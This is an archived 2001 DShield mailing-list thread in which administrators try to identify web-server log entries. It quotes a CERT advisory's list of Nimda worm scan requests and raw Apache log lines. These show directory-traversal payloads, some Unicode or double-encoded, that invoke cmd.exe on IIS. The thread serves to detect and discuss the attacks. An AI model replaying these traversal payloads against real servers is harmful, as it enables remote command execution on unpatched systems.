[Dshield] New one?

Stan Markham smarkham at ci.mesquite.tx.us
Thu Oct 18 13:01:13 GMT 2001


Sorry - fat fingers and no coffee.

from http://www.cert.org/advisories/CA-2001-26.html

The scanning activity of the Nimda worm produces the following log entries
for any web server listening on port 80/tcp:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

-----Original Message-----
From: Stan Markham [mailto:smarkham at ci.mesquite.tx.us]
Sent: Thursday, October 18, 2001 7:58 AM
To: 'dshield at dshield.org'
Subject: RE: [Dshield] New one?


Definitely not a 'one shot' attempt. I've been seeing these on a daily
basis since early June, right after they were mentioned in cert.org's digest.
-----Original Message-----
From: dshield-admin at dshield.org [mailto:dshield-admin at dshield.org] On Behalf Of Martin Mueller
Sent: Thursday, October 18, 2001 3:09 AM
To: dshield at dshield.org
Subject: Re: [Dshield] New one?


I am wondering why nobody else has sent any logs like this to this mailing
list till now.
Perhaps it was a single try and a false alert.

Martin

Tony Maro wrote:

> Oh crap - looks like it's trying the standard directory traversal with a
> twist, BUT... what's significant is that it looks like it's coming from a
> Winblows 98 box!
>
> If there's a new bug infecting 98 that does this, that's gonna be one massive
> DOS attack.
>
> -----Original Message-----
> From: Martin Mueller [mailto:mueller at webpartner.de]
> Sent: Wednesday, October 17, 2001 8:05 AM
> To: dshield at dshield.org
> Subject: [Dshield] New one?
>
> Hi all,
>
> I found these log entries today on an Apache virtual web server of my company.
> Sorry, the lines are very long, but all different...
>
> Is this a new "Code Red" or something?
> It doesn't look like the "normal" CR or Nimda to me.
>
> The "attacking IP" is located in Brazil (if it is the real one :-) ); we are in
> Germany.
>
> Best regards,
>
> Martin Mueller
> ----------------------------------------
> Webpartner Kommunikationsdienste GmbH
> Metzstrasse 14b
> 81667 Muenchen
>
> Tel: 089/480 88 89-0
> Fax: 089/480 88 89-9
>
> mueller at webpartner.de
> http://www.webpartner.de
> ----------------------------------------
> Already clicked? http://www.urlpartner.de
> Manage your favourites online
> A project of Webpartner GmbH
>
> 200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET /msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\ HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
> 200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www1.dshield.org/mailman/listinfo/dshield

--
With kind regards

Martin Mueller
----------------------------------------
Webpartner Kommunikationsdienste GmbH
Metzstrasse 14b
81667 Muenchen

Tel: 089/480 88 89-0
Fax: 089/480 88 89-9

mueller at webpartner.de
http://www.webpartner.de
----------------------------------------
Already clicked? http://www.urlpartner.de
Manage your favourites online
A project of Webpartner GmbH

